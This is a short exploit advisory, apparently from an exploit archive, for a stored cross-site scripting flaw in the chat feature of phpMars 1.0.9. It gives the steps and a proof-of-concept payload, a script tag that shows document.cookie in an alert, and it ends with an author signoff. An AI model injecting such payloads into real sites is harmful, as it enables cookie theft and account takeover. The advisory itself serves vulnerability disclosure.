phpMars 1.0.9 Cross Site Scripting

phpMars version 1.0.9 suffers from a cross site scripting vulnerability.


MD5 | d1205a24c4da3d1ec41231258fdcf33e

# Exploit Title: phpMars - Photos Social Network ( instagram clone ) - Cross Site Scripting
# Google Dork: N/A
# Date: 2017/20/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: http://grohsfabian.com/
# Software Buy:
https://codecanyon.net/item/phpmars-photos-social-network-instagram-clone-/
# Demo: http://phpmars.grohsfabian.com/index
# Version: 1.0.9
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. Login to panel
2. go to chat http://site//messages/user
3. send message : <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
| My Message To |
\-------------------------------------------------------------/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Related Posts

Comments